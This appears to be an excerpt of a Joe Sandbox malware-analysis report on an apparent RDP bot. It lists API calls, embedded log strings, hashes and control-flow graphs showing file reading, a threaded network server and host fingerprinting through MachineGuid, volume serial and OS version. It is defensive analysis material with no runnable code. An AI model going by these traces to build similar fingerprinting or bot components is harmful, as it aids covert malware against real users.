                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                                      • String ID:
                                                      • API String ID: 3714283218-0
                                                      • Opcode ID: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
                                                      • Instruction ID: a04ef1b98618b81a81f505b2b26b9330924ef20d364bf9673053a5008fdfde06
                                                      • Opcode Fuzzy Hash: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
                                                      • Instruction Fuzzy Hash: CE5129A5E08A4685FB50FB65FC50A79A3A4BF48BA8F844435DE0F57399DF3CE44083A0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastrecv
                                                      • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                      • API String ID: 2514157807-65069805
                                                      • Opcode ID: 43826edd6c03a2403c5b239c4a6026a88362b96a78e842123ee6fb6f2739a3e5
                                                      • Instruction ID: 34d74474908344aee466c0af758f4bc0b8c16ccb54445f1c46487481c3889db4
                                                      • Opcode Fuzzy Hash: 43826edd6c03a2403c5b239c4a6026a88362b96a78e842123ee6fb6f2739a3e5
                                                      • Instruction Fuzzy Hash: 5E118F98F0E55F92F6125F25A86077812506F23FB0F801B30E93D9A7E7DF5CA9169308

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ff70cad4fc5-7ff70cad4fe1 1 7ff70cad5077-7ff70cad50a5 call 7ff70cad2ef2 0->1 2 7ff70cad4fe7-7ff70cad4fea 0->2 10 7ff70cad5529-7ff70cad553a 1->10 4 7ff70cad4ff0-7ff70cad4ff4 2->4 5 7ff70cad50aa-7ff70cad50d8 call 7ff70cad2ef2 2->5 8 7ff70cad4ff6-7ff70cad4ffa 4->8 9 7ff70cad5000-7ff70cad5015 fopen 4->9 5->10 8->9 12 7ff70cad50dd-7ff70cad510b call 7ff70cad2ef2 8->12 13 7ff70cad5110-7ff70cad5139 _errno call 7ff70cad2ef2 _errno 9->13 14 7ff70cad501b-7ff70cad5030 fseek 9->14 15 7ff70cad5543-7ff70cad5550 10->15 16 7ff70cad553c 10->16 12->10 29 7ff70cad517f-7ff70cad5193 _errno 13->29 30 7ff70cad513b-7ff70cad5148 13->30 19 7ff70cad51e3-7ff70cad51f0 call 7ff70cade438 14->19 20 7ff70cad5036-7ff70cad505f _errno call 7ff70cad2ef2 _errno 14->20 22 7ff70cad5552-7ff70cad5563 call 7ff70cad2ef2 15->22 23 7ff70cad5589-7ff70cad5590 15->23 16->15 33 7ff70cad51f2 19->33 34 7ff70cad521b-7ff70cad5244 _errno call 7ff70cad2ef2 _errno 19->34 36 7ff70cad5065-7ff70cad5072 20->36 37 7ff70cad51ca-7ff70cad51de _errno 20->37 35 7ff70cad5568-7ff70cad557a 22->35 23->22 32 7ff70cad5518-7ff70cad551b 29->32 30->29 38 7ff70cad5525-7ff70cad5527 32->38 39 7ff70cad551d-7ff70cad5520 fclose 32->39 40 7ff70cad5513 33->40 41 7ff70cad51f8-7ff70cad51fd 33->41 48 7ff70cad5246-7ff70cad5253 34->48 49 7ff70cad528a-7ff70cad529e _errno 34->49 36->1 37->32 38->10 43 7ff70cad5592-7ff70cad55ab call 7ff70cad2ef2 38->43 39->38 40->32 44 7ff70cad52a3-7ff70cad52bb fseek 41->44 45 7ff70cad5203-7ff70cad5208 41->45 43->35 51 7ff70cad5331-7ff70cad535a _errno call 7ff70cad2ef2 _errno 44->51 52 7ff70cad52bd-7ff70cad52c9 44->52 45->44 47 7ff70cad520e-7ff70cad5216 45->47 47->32 48->49 49->32 62 7ff70cad53a0-7ff70cad53b4 _errno 51->62 63 7ff70cad535c-7ff70cad5369 51->63 53 7ff70cad52cf-7ff70cad52d5 52->53 54 7ff70cad53b9-7ff70cad53db GetProcessHeap HeapAlloc 52->54 57 7ff70cad5582-7ff70cad5587 53->57 58 7ff70cad52db 53->58 54->53 60 7ff70cad53e1-7ff70cad53f7 call 7ff70cad2ef2 54->60 57->32 61 7ff70cad52e0-7ff70cad52ef 58->61 60->53 66 7ff70cad52f5-7ff70cad52f7 61->66 67 7ff70cad548e-7ff70cad5497 61->67 62->32 63->62 66->67 68 7ff70cad52fd-7ff70cad5320 fread 66->68 69 7ff70cad54bf-7ff70cad54e2 call 7ff70cad2ef2 67->69 70 7ff70cad5499-7ff70cad549b 67->70 68->67 71 7ff70cad5326 68->71 73 7ff70cad549d-7ff70cad54a2 69->73 72 7ff70cad54e4-7ff70cad54e9 70->72 70->73 75 7ff70cad53fc-7ff70cad5425 _errno call 7ff70cad2ef2 _errno 71->75 76 7ff70cad532c-7ff70cad532f 71->76 79 7ff70cad54f3-7ff70cad54fc 72->79 80 7ff70cad54eb-7ff70cad54f1 72->80 73->32 77 7ff70cad54a4-7ff70cad54bd GetProcessHeap HeapFree 73->77 83 7ff70cad546b-7ff70cad547f _errno 75->83 84 7ff70cad5427-7ff70cad5434 75->84 76->61 77->32 79->80 80->32 83->61 84->83
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: _errno$fclosefflushfopenfseekfwrite
                                                      • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                                      • API String ID: 2897271634-4120527733
                                                      • Opcode ID: e3dc7cfb89ace61d4ab551d8823ed4437bc708a7bcac596e6dd945ffa861774d
                                                      • Instruction ID: 028c761d3a675f624d454e686a1dcd2a7457f8e40e268681df35e2e7688c7a5d
                                                      • Opcode Fuzzy Hash: e3dc7cfb89ace61d4ab551d8823ed4437bc708a7bcac596e6dd945ffa861774d
                                                      • Instruction Fuzzy Hash: 63D14AE1E08A0381EA11BB55FC40FB8A761AF55799FC44132DA0F476A9EF3CE985C360

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 85 7ffda5ba3aa7-7ffda5ba3aca InitializeCriticalSectionAndSpinCount 86 7ffda5ba3ad0-7ffda5ba3af7 InitializeCriticalSectionAndSpinCount 85->86 87 7ffda5ba3c52-7ffda5ba3c73 GetLastError call 7ffda5ba2072 85->87 88 7ffda5ba3d6e-7ffda5ba3d8f GetLastError call 7ffda5ba2072 86->88 89 7ffda5ba3afd-7ffda5ba3b0d 86->89 99 7ffda5ba3c75 87->99 100 7ffda5ba3c8d-7ffda5ba3c93 87->100 103 7ffda5ba3da9-7ffda5ba3daf 88->103 104 7ffda5ba3d91 88->104 92 7ffda5ba4140-7ffda5ba4158 call 7ffda5ba2072 89->92 93 7ffda5ba3b13-7ffda5ba3b4b CreateThread 89->93 107 7ffda5ba415d-7ffda5ba4164 92->107 96 7ffda5ba3e46-7ffda5ba3e67 GetLastError call 7ffda5ba2072 93->96 97 7ffda5ba3b51-7ffda5ba3b6d call 7ffda5ba2072 93->97 121 7ffda5ba3e69 96->121 122 7ffda5ba3e7d-7ffda5ba3e83 96->122 97->92 127 7ffda5ba3b73-7ffda5ba3bab CreateThread 97->127 108 7ffda5ba3c7b-7ffda5ba3c88 99->108 109 7ffda5ba3d1e 99->109 101 7ffda5ba3c99-7ffda5ba3c9f 100->101 102 7ffda5ba3d32 100->102 110 7ffda5ba3ccb-7ffda5ba3cce 101->110 111 7ffda5ba3ca1-7ffda5ba3ca7 101->111 120 7ffda5ba3d3c 102->120 115 7ffda5ba4165-7ffda5ba416a 103->115 116 7ffda5ba3db5-7ffda5ba3dbb 103->116 112 7ffda5ba3d97-7ffda5ba3da4 104->112 113 7ffda5ba413b 104->113 108->100 109->102 125 7ffda5ba3cd0-7ffda5ba3cd3 110->125 126 7ffda5ba3ce4-7ffda5ba3cea 110->126 118 7ffda5ba3d5a 111->118 119 7ffda5ba3cad-7ffda5ba3cb3 111->119 112->103 113->92 115->92 123 7ffda5ba3de7-7ffda5ba3dea 116->123 124 7ffda5ba3dbd-7ffda5ba3dc3 116->124 131 7ffda5ba3d64 118->131 130 7ffda5ba3cb9-7ffda5ba3cbf 119->130 119->131 146 7ffda5ba3d46 120->146 132 7ffda5ba3e6b-7ffda5ba3e78 121->132 133 7ffda5ba3e9f-7ffda5ba3eaf 121->133 136 7ffda5ba3e85 122->136 137 7ffda5ba3ee0-7ffda5ba3ef0 122->137 139 7ffda5ba3e08-7ffda5ba3e0e 123->139 140 7ffda5ba3dec-7ffda5ba3def 123->140 134 7ffda5ba3dc9-7ffda5ba3dcf 124->134 135 7ffda5ba4181-7ffda5ba4186 124->135 125->120 138 7ffda5ba3cd5-7ffda5ba3cd8 125->138 141 7ffda5ba3cec 126->141 142 7ffda5ba3d50 126->142 128 7ffda5ba3f4e-7ffda5ba3f6f GetLastError call 7ffda5ba2072 127->128 129 7ffda5ba3bb1-7ffda5ba3bcd call 7ffda5ba2072 127->129 172 7ffda5ba3f85-7ffda5ba3f8b 128->172 173 7ffda5ba3f71 128->173 129->92 167 7ffda5ba3bd3-7ffda5ba3c0b CreateThread 129->167 149 7ffda5ba3cf6 130->149 150 7ffda5ba3cc1 130->150 131->88 132->122 133->92 152 7ffda5ba3dd5-7ffda5ba3ddb 134->152 153 7ffda5ba4188-7ffda5ba418d 134->153 135->92 147 7ffda5ba3e87-7ffda5ba3e8d 136->147 148 7ffda5ba3eb4-7ffda5ba3eb7 136->148 137->92 138->146 154 7ffda5ba3cda 138->154 143 7ffda5ba417a-7ffda5ba417f 139->143 144 7ffda5ba3e14-7ffda5ba3e19 139->144 155 7ffda5ba3df5-7ffda5ba3df8 140->155 156 7ffda5ba416c-7ffda5ba4171 140->156 141->149 142->118 143->92 144->92 146->142 158 7ffda5ba3e8f-7ffda5ba3e95 147->158 159 7ffda5ba3ec3-7ffda5ba3ed3 147->159 160 7ffda5ba3ed8-7ffda5ba3ede 148->160 161 7ffda5ba3eb9-7ffda5ba3ebc 148->161 149->109 150->110 163 7ffda5ba3e1e-7ffda5ba3e23 152->163 164 7ffda5ba3ddd-7ffda5ba3de2 152->164 153->92 154->126 165 7ffda5ba3dfe-7ffda5ba3e03 155->165 166 7ffda5ba4173-7ffda5ba4178 155->166 156->92 168 7ffda5ba3ef5-7ffda5ba3f05 158->168 169 7ffda5ba3e97-7ffda5ba3e9d 158->169 159->92 160->133 160->137 170 7ffda5ba3f0a-7ffda5ba3f1a 161->170 171 7ffda5ba3ebe-7ffda5ba3ec1 161->171 163->92 164->92 165->92 166->92 174 7ffda5ba404c-7ffda5ba406d GetLastError call 7ffda5ba2072 167->174 175 7ffda5ba3c11-7ffda5ba3c2d call 7ffda5ba2072 167->175 168->92 169->133 169->137 170->92 171->133 171->159 178 7ffda5ba3fe8-7ffda5ba3ff8 172->178 179 7ffda5ba3f8d 172->179 176 7ffda5ba3fa7-7ffda5ba3fb7 173->176 177 7ffda5ba3f73-7ffda5ba3f80 173->177 195 7ffda5ba406f 174->195 196 7ffda5ba4083-7ffda5ba4089 174->196 175->92 194 7ffda5ba3c33-7ffda5ba3c48 call 7ffda5ba2072 175->194 176->92 177->172 178->92 182 7ffda5ba3fbc-7ffda5ba3fbf 179->182 183 7ffda5ba3f8f-7ffda5ba3f95 179->183 184 7ffda5ba3fe0-7ffda5ba3fe6 182->184 185 7ffda5ba3fc1-7ffda5ba3fc4 182->185 188 7ffda5ba3f97-7ffda5ba3f9d 183->188 189 7ffda5ba3fcb-7ffda5ba3fdb 183->189 184->176 184->178 192 7ffda5ba3fc6-7ffda5ba3fc9 185->192 193 7ffda5ba4012-7ffda5ba4022 185->193 190 7ffda5ba3ffd-7ffda5ba400d 188->190 191 7ffda5ba3f9f-7ffda5ba3fa5 188->191 189->92 190->92 191->176 191->178 192->176 192->189 193->92 202 7ffda5ba3c4d 194->202 198 7ffda5ba4071-7ffda5ba407e 195->198 199 7ffda5ba40e3-7ffda5ba40f3 195->199 200 7ffda5ba40b9-7ffda5ba40c9 196->200 201 7ffda5ba408b 196->201 198->196 199->92 200->92 203 7ffda5ba40cb-7ffda5ba40d1 201->203 204 7ffda5ba408d-7ffda5ba4090 201->204 202->107 207 7ffda5ba409c-7ffda5ba40ac 203->207 208 7ffda5ba40d3-7ffda5ba40d9 203->208 205 7ffda5ba4092-7ffda5ba4095 204->205 206 7ffda5ba40b1-7ffda5ba40b7 204->206 209 7ffda5ba4107-7ffda5ba4117 205->209 210 7ffda5ba4097-7ffda5ba409a 205->210 206->199 206->200 207->92 211 7ffda5ba40f5-7ffda5ba4105 208->211 212 7ffda5ba40db-7ffda5ba40e1 208->212 209->92 210->199 210->207 211->92 212->199 212->200
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
                                                      • String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
                                                      • API String ID: 3214881788-719614687
                                                      • Opcode ID: d638e0b7ae0cc837bf64db790b7c8563c2784f512e66f92d57f32784526b986c
                                                      • Instruction ID: 040fd48c8053843387ee4481c230b1aee65f4cbe8bde30c75ce6e4771d91148a
                                                      • Opcode Fuzzy Hash: d638e0b7ae0cc837bf64db790b7c8563c2784f512e66f92d57f32784526b986c
                                                      • Instruction Fuzzy Hash: 04F1FC60F0EB0B83FB705714A8B43B925509B17B27F250B32D66E063E7DE6FA945824D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 213 7ffda5ba482c-7ffda5ba4846 call 7ffda5ba5154 216 7ffda5ba4d68 213->216 217 7ffda5ba484c-7ffda5ba4861 call 7ffda5ba50d3 213->217 220 7ffda5ba4d7c-7ffda5ba4d81 216->220 221 7ffda5ba48b7 217->221 222 7ffda5ba4863-7ffda5ba4891 217->222 223 7ffda5ba48c9-7ffda5ba48e0 call 7ffda5ba2072 220->223 224 7ffda5ba48bc-7ffda5ba48c7 FreeLibrary 221->224 229 7ffda5ba489a-7ffda5ba48b5 call 7ffda5ba2072 222->229 230 7ffda5ba4893-7ffda5ba4898 222->230 228 7ffda5ba48e5-7ffda5ba48f2 223->228 224->223 227 7ffda5ba48f3-7ffda5ba492c GetNativeSystemInfo GetWindowsDirectoryA 224->227 231 7ffda5ba4a10-7ffda5ba4a33 call 7ffda5ba2072 227->231 232 7ffda5ba4932-7ffda5ba4953 GetLastError call 7ffda5ba2072 227->232 229->224 230->224 231->223 241 7ffda5ba4a39-7ffda5ba4a6f call 7ffda5ba9ad2 231->241 239 7ffda5ba4955 232->239 240 7ffda5ba4973-7ffda5ba4979 232->240 242 7ffda5ba4957-7ffda5ba4964 239->242 243 7ffda5ba4969-7ffda5ba496e 239->243 240->220 244 7ffda5ba497f-7ffda5ba4985 240->244 251 7ffda5ba4a75-7ffda5ba4a77 241->251 252 7ffda5ba4b20-7ffda5ba4b3c call 7ffda5ba2072 241->252 242->243 243->223 246 7ffda5ba4987-7ffda5ba498a 244->246 247 7ffda5ba49be-7ffda5ba49c4 244->247 249 7ffda5ba49a8-7ffda5ba49ae 246->249 250 7ffda5ba498c-7ffda5ba498f 246->250 253 7ffda5ba49ca-7ffda5ba49d0 247->253 254 7ffda5ba4da4-7ffda5ba4da9 247->254 259 7ffda5ba4d9a-7ffda5ba4d9f 249->259 260 7ffda5ba49b4-7ffda5ba49b9 249->260 256 7ffda5ba4d86-7ffda5ba4d8b 250->256 257 7ffda5ba4995-7ffda5ba4998 250->257 251->223 258 7ffda5ba4a7d-7ffda5ba4ada GetVolumeInformationA 251->258 265 7ffda5ba4b41 252->265 261 7ffda5ba49d6-7ffda5ba49dc 253->261 262 7ffda5ba4dae-7ffda5ba4db3 253->262 254->223 256->223 266 7ffda5ba499e-7ffda5ba49a3 257->266 267 7ffda5ba4d90-7ffda5ba4d95 257->267 268 7ffda5ba4bd7-7ffda5ba4c09 call 7ffda5ba2072 258->268 269 7ffda5ba4ae0-7ffda5ba4b06 GetLastError call 7ffda5ba2072 258->269 259->223 260->223 263 7ffda5ba49e8-7ffda5ba49ed 261->263 264 7ffda5ba49de-7ffda5ba49e3 261->264 262->223 263->223 264->223 265->251 266->223 267->223 274 7ffda5ba4c0b-7ffda5ba4c17 strlen 268->274 275 7ffda5ba4c1d-7ffda5ba4c24 268->275 276 7ffda5ba4b46-7ffda5ba4b4c 269->276 277 7ffda5ba4b08 269->277 274->275 278 7ffda5ba4ce9-7ffda5ba4ced 274->278 279 7ffda5ba4c28-7ffda5ba4c85 call 7ffda5ba2072 275->279 280 7ffda5ba4b52 276->280 281 7ffda5ba4ca3-7ffda5ba4ca8 276->281 282 7ffda5ba4b0e-7ffda5ba4b1b 277->282 283 7ffda5ba4c8f-7ffda5ba4c94 277->283 278->275 284 7ffda5ba4cf3-7ffda5ba4cf7 278->284 289 7ffda5ba4c8a 279->289 286 7ffda5ba4b8b-7ffda5ba4b91 280->286 287 7ffda5ba4b54-7ffda5ba4b57 280->287 281->223 282->252 283->223 284->275 288 7ffda5ba4cfd-7ffda5ba4d30 _errno strtol _errno 284->288 292 7ffda5ba4b97-7ffda5ba4b9d 286->292 293 7ffda5ba4ccb-7ffda5ba4cd0 286->293 290 7ffda5ba4b75-7ffda5ba4b7b 287->290 291 7ffda5ba4b59-7ffda5ba4b5c 287->291 294 7ffda5ba4d40-7ffda5ba4d63 _errno call 7ffda5ba2072 288->294 295 7ffda5ba4d32-7ffda5ba4d35 288->295 289->228 298 7ffda5ba4cc1-7ffda5ba4cc6 290->298 299 7ffda5ba4b81-7ffda5ba4b86 290->299 296 7ffda5ba4cad-7ffda5ba4cb2 291->296 297 7ffda5ba4b62-7ffda5ba4b65 291->297 300 7ffda5ba4cd5-7ffda5ba4cda 292->300 301 7ffda5ba4ba3-7ffda5ba4ba9 292->301 293->223 294->275 295->279 302 7ffda5ba4d3b 295->302 296->223 304 7ffda5ba4cb7-7ffda5ba4cbc 297->304 305 7ffda5ba4b6b-7ffda5ba4b70 297->305 298->223 299->223 300->223 306 7ffda5ba4cdf-7ffda5ba4ce4 301->306 307 7ffda5ba4baf-7ffda5ba4bb4 301->307 302->275 304->223 305->223 306->223 307->223
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                      • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                      • API String ID: 3828489143-883582248
                                                      • Opcode ID: 9fd6b73975f7bf016800440e9bc28cda26a8abd548152f339e05862e81f836a2
                                                      • Instruction ID: d68925c72911801355547e79c13e1ec5ab80965e28e27cbd2a59ad6eb16e092e
                                                      • Opcode Fuzzy Hash: 9fd6b73975f7bf016800440e9bc28cda26a8abd548152f339e05862e81f836a2
                                                      • Instruction Fuzzy Hash: 77D18F21F0EA5A86FF208714E4703FA6350AF03F56F160932DA4E177A6DE6EE8448349

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 407 7ffda55ac25c-7ffda55ac276 call 7ffda55abc64 410 7ffda55ac798 407->410 411 7ffda55ac27c-7ffda55ac291 call 7ffda55abbe3 407->411 413 7ffda55ac7ac-7ffda55ac7b1 410->413 416 7ffda55ac2e7 411->416 417 7ffda55ac293-7ffda55ac2c1 411->417 415 7ffda55ac2f9-7ffda55ac310 call 7ffda55ac852 413->415 421 7ffda55ac315-7ffda55ac322 415->421 418 7ffda55ac2ec-7ffda55ac2f7 FreeLibrary 416->418 425 7ffda55ac2ca-7ffda55ac2e5 call 7ffda55ac852 417->425 426 7ffda55ac2c3-7ffda55ac2c8 417->426 418->415 420 7ffda55ac323-7ffda55ac35c GetNativeSystemInfo GetWindowsDirectoryA 418->420 423 7ffda55ac440-7ffda55ac463 call 7ffda55ac852 420->423 424 7ffda55ac362-7ffda55ac383 GetLastError call 7ffda55ac852 420->424 423->415 435 7ffda55ac469-7ffda55ac49f call 7ffda55a5192 423->435 433 7ffda55ac385 424->433 434 7ffda55ac3a3-7ffda55ac3a9 424->434 425->418 426->418 436 7ffda55ac387-7ffda55ac394 433->436 437 7ffda55ac399-7ffda55ac39e 433->437 434->413 438 7ffda55ac3af-7ffda55ac3b5 434->438 445 7ffda55ac4a5-7ffda55ac4a7 435->445 446 7ffda55ac550-7ffda55ac56c call 7ffda55ac852 435->446 436->437 437->415 440 7ffda55ac3b7-7ffda55ac3ba 438->440 441 7ffda55ac3ee-7ffda55ac3f4 438->441 443 7ffda55ac3d8-7ffda55ac3de 440->443 444 7ffda55ac3bc-7ffda55ac3bf 440->444 447 7ffda55ac3fa-7ffda55ac400 441->447 448 7ffda55ac7d4-7ffda55ac7d9 441->448 452 7ffda55ac7ca-7ffda55ac7cf 443->452 453 7ffda55ac3e4-7ffda55ac3e9 443->453 449 7ffda55ac3c5-7ffda55ac3c8 444->449 450 7ffda55ac7b6-7ffda55ac7bb 444->450 445->415 451 7ffda55ac4ad-7ffda55ac50a GetVolumeInformationA 445->451 463 7ffda55ac571 446->463 454 7ffda55ac406-7ffda55ac40c 447->454 455 7ffda55ac7de-7ffda55ac7e3 447->455 448->415 457 7ffda55ac7c0-7ffda55ac7c5 449->457 458 7ffda55ac3ce-7ffda55ac3d3 449->458 450->415 459 7ffda55ac607-7ffda55ac639 call 7ffda55ac852 451->459 460 7ffda55ac510-7ffda55ac536 GetLastError call 7ffda55ac852 451->460 452->415 453->415 461 7ffda55ac418-7ffda55ac41d 454->461 462 7ffda55ac40e-7ffda55ac413 454->462 455->415 457->415 458->415 470 7ffda55ac63b-7ffda55ac647 strlen 459->470 471 7ffda55ac64d-7ffda55ac654 459->471 468 7ffda55ac538 460->468 469 7ffda55ac576-7ffda55ac57c 460->469 461->415 462->415 463->445 472 7ffda55ac6bf-7ffda55ac6c4 468->472 473 7ffda55ac53e-7ffda55ac54b 468->473 475 7ffda55ac6d3-7ffda55ac6d8 469->475 476 7ffda55ac582 469->476 470->471 474 7ffda55ac719-7ffda55ac71d 470->474 477 7ffda55ac658-7ffda55ac6b5 call 7ffda55ac852 471->477 472->415 473->446 474->471 478 7ffda55ac723-7ffda55ac727 474->478 475->415 479 7ffda55ac5bb-7ffda55ac5c1 476->479 480 7ffda55ac584-7ffda55ac587 476->480 487 7ffda55ac6ba 477->487 478->471 484 7ffda55ac72d-7ffda55ac760 _errno call 7ffda55b4610 _errno 478->484 482 7ffda55ac5c7-7ffda55ac5cd 479->482 483 7ffda55ac6fb-7ffda55ac700 479->483 485 7ffda55ac5a5-7ffda55ac5ab 480->485 486 7ffda55ac589-7ffda55ac58c 480->486 490 7ffda55ac705-7ffda55ac70a 482->490 491 7ffda55ac5d3-7ffda55ac5d9 482->491 483->415 500 7ffda55ac770-7ffda55ac793 _errno call 7ffda55ac852 484->500 501 7ffda55ac762-7ffda55ac765 484->501 488 7ffda55ac6f1-7ffda55ac6f6 485->488 489 7ffda55ac5b1-7ffda55ac5b6 485->489 493 7ffda55ac6dd-7ffda55ac6e2 486->493 494 7ffda55ac592-7ffda55ac595 486->494 487->421 488->415 489->415 490->415 497 7ffda55ac70f-7ffda55ac714 491->497 498 7ffda55ac5df-7ffda55ac5e4 491->498 493->415 495 7ffda55ac6e7-7ffda55ac6ec 494->495 496 7ffda55ac59b-7ffda55ac5a0 494->496 495->415 496->415 497->415 498->415 500->471 501->477 502 7ffda55ac76b 501->502 502->471
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
